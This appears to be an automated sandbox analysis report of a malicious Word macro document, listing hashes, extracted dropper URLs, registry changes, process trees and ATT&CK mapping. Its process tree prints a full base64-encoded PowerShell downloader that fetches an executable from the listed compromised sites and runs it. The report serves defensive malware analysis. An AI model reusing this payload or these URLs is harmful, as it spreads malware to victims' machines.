0212a69aeefb6354edbb728fbd3cb4ec28d88efcf7a3f343e3e67884fb9978e9

General

Target

0212a69aeefb6354edbb728fbd3cb4ec28d88efcf7a3f343e3e67884fb9978e9.doc
Size

174KB
MD5

d7eb240f86f8883dfbc77ed13b4e9ba9
SHA1

3d800e1b0e366d50dcfa7c9ae5cca0c1857db176
SHA256

0212a69aeefb6354edbb728fbd3cb4ec28d88efcf7a3f343e3e67884fb9978e9
SHA512

b5e51422d562c3e4162dbc415eba3d3522986710108b92535d2dcb98f6f1128704c45041d6ba373d868d9a8c90c166201a25f5601b45fb4c3bf273c3d78aacdf

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://sukuntextile.com/wp_old/v_N/

exe.dropper

http://www.astoriadrycleaning.com.sg/wp-content/S_4v/

exe.dropper

http://d1mension-capitaland.vn/wp-admin/Dm_C/

exe.dropper

http://xn--80ajoksa8ap9b.xn--p1ai/administrator/r4_iG/

exe.dropper

http://e3consulting.co.me/blogs/e9_6/

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1008	1168	powershell.exe	29

Modifies Internet Explorer settings 1 TTPs 6 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\Toolbar	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\MenuExt	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	WINWORD.EXE

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\0212a69aeefb6354edbb728fbd3cb4ec28d88efcf7a3f343e3e67884fb9978e9.doc"
1⤵
- Modifies Internet Explorer settings
PID:1016
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:1816

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -e JABkAHcAQQAxAEEAQQBBAEMAPQAoACIAewAxAH0AewAyAH0AewAwAH0AIgAtAGYAIAAnADQAdwAnACwAJwB3AEEAXwAnACwAJwBRACcAKQA7ACQAVwBCAF8AMQBCAFgAbwA9AE4AZQBgAHcAYAAtAG8AYgBgAEoAZQBDAHQAIAAoACcATgBlAHQALgBXAGUAJwArACcAYgAnACsAJwBDAGwAaQAnACsAJwBlAG4AJwArACcAdAAnACkAOwAkAGQAUQA0AEQANABRAFgAPQAoACIAewAyADcAfQB7ADIANQB9AHsAMwA0AH0AewAxADMAfQB7ADIAOAB9AHsAOQB9AHsAMgA2AH0AewAzAH0AewAyADQAfQB7ADEAMAB9AHsAMQA1AH0AewAxADIAfQB7ADEAMQB9AHsAMQA0AH0AewAxADYAfQB7ADEANwB9AHsAMgA5AH0AewAzADMAfQB7ADcAfQB7ADAAfQB7ADQAfQB7ADYAfQB7ADIAfQB7ADIAMQB9AHsAMwAwAH0AewAyADAAfQB7ADUAfQB7ADMAMQB9AHsAMgAyAH0AewAxADgAfQB7ADgAfQB7ADMAMgB9AHsAMQA5AH0AewAxAH0AewAyADMAfQAiACAALQBmACAAJwB0AHAAOgAvAC8AJwAsACcAYwBvAG4AcwB1AGwAdABpAG4AZwAuAGMAbwAuAG0AZQAvAGIAbABvAGcAcwAvACcALAAnADgAYQBwADkAYgAuAHgAbgAtAC0AcAAxAGEAaQAvAGEAJwAsACcAaAB0ACcALAAnAHgAJwAsACcAYQAnACwAJwBuAC0ALQA4ADAAYQBqAG8AawBzAGEAJwAsACcAaAB0ACcALAAnAF8AaQBHAC8AQABoAHQAdABwADoAJwAsACcAdgBfAE4AJwAsACcAbwByACcALAAnAF8ANAAnACwAJwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AUwAnACwAJwAuAGMAbwBtACcALAAnAHYALwBAAGgAdAB0AHAAOgAvAC8AZAAxACcALAAnAGkAYQBkAHIAeQBjAGwAZQBhAG4AaQBuAGcALgBjAG8AbQAuAHMAZwAvACcALAAnAG0AZQBuAHMAaQBvAG4ALQBjAGEAJwAsACcAcABpAHQAYQBsACcALAAnAHIALwByADQAJwAsACcAZQAzACcALAAnAHIAJwAsACcAZABtAGkAbgBpACcALAAnAG8AJwAsACcAZQA5AF8ANgAvACcALAAnAHQAcAA6AC8ALwB3AHcAdwAuAGEAcwB0ACcALAAnAHUAawAnACwAJwAvAEAAJwAsACcAaAB0AHQAcAA6AC8ALwBzACcALAAnAC8AdwBwAF8AbwBsAGQALwAnACwAJwBhAG4AZAAuACcALAAnAHMAdAAnACwAJwB0ACcALAAnAC8ALwAnACwAJwB2AG4ALwB3AHAALQBhAGQAbQBpAG4ALwBEAG0AXwBDAC8AQAAnACwAJwB1AG4AdABlAHgAdABpAGwAZQAnACkALgAiAFMAUABgAEwASQBUACIAKAAnAEAAJwApADsAJABhAEIAXwBBAFUAQgBaAEEAPQAoACIAewAwAH0AewAxAH0AIgAtAGYAJwBwAEEAQQBBACcALAAnAEIAQgB3ACcAKQA7ACQAagBVAFUAQQBEAEEANABrACAAPQAgACcAMwA1ADEAJwA7ACQAcABBAEEAQQBrAG8AeAA9ACgAIgB7ADAAfQB7ADIAfQB7ADEAfQAiAC0AZgAnAHcAWABvACcALAAnAHcAWgAnACwAJwBjAFEANAAnACkAOwAkAGQAQQBBADQAQQBDAGsAQgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAagBVAFUAQQBEAEEANABrACsAKAAiAHsAMAB9AHsAMQB9ACIALQBmACAAJwAuAGUAeAAnACwAJwBlACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAFAAQQBBAEEAQQBBACAAaQBuACAAJABkAFEANABEADQAUQBYACkAewB0AHIAeQB7ACQAVwBCAF8AMQBCAFgAbwAuACIARABPAFcATgBMAG8AYABBAGQAZgBgAEkAYABMAEUAIgAoACQAUABBAEEAQQBBAEEALAAgACQAZABBAEEANABBAEMAawBCACkAOwAkAFIAQQBBAF8AQgBBAFUAPQAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACcAQQBaAEEAJwAsACcAegBBAEIAJwApADsASQBmACAAKAAoAGcAZQB0AGAALQBpAGAAVABlAE0AIAAkAGQAQQBBADQAQQBDAGsAQgApAC4AIgBMAGUAYABOAGAARwB0AEgAIgAgAC0AZwBlACAANAAwADAAMAAwACkAIAB7AGkAbgB2AG8ASwBFAGAALQBgAEkAYABUAGUAbQAgACQAZABBAEEANABBAEMAawBCADsAJABqADEAQQBBAEIAQQBBAD0AKAAiAHsAMQB9AHsAMgB9AHsAMAB9ACIAIAAtAGYAIAAnADQAQQAnACwAJwB3ACcALAAnAEEAeABYACcAKQA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAewB9AH0AJABVAEEAQQBHAEEAeABVAEcAPQAoACIAewAxAH0AewAwAH0AewAyAH0AIgAtAGYAIAAnAEEARABYAEEAdwAnACwAJwBOAEQAJwAsACcAUQAnACkAOwA=
1⤵
- Process spawned unexpected child process
PID:1008

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1008-62-0x000007FEF3C90000-0x000007FEF47ED000-memory.dmp

Filesize
11.4MB

Download
memory/1008-64-0x0000000001E7B000-0x0000000001E9A000-memory.dmp

Filesize
124KB

Download
memory/1008-63-0x0000000001E74000-0x0000000001E77000-memory.dmp

Filesize
12KB

Download
memory/1016-54-0x0000000072F11000-0x0000000072F14000-memory.dmp

Filesize
12KB

Download
memory/1016-55-0x0000000070991000-0x0000000070993000-memory.dmp

Filesize
8KB

Download
memory/1016-56-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1016-57-0x0000000075AE1000-0x0000000075AE3000-memory.dmp

Filesize
8KB

Download
memory/1016-58-0x000000007197D000-0x0000000071988000-memory.dmp

Filesize
44KB

Download
memory/1816-60-0x000007FEFC5C1000-0x000007FEFC5C3000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads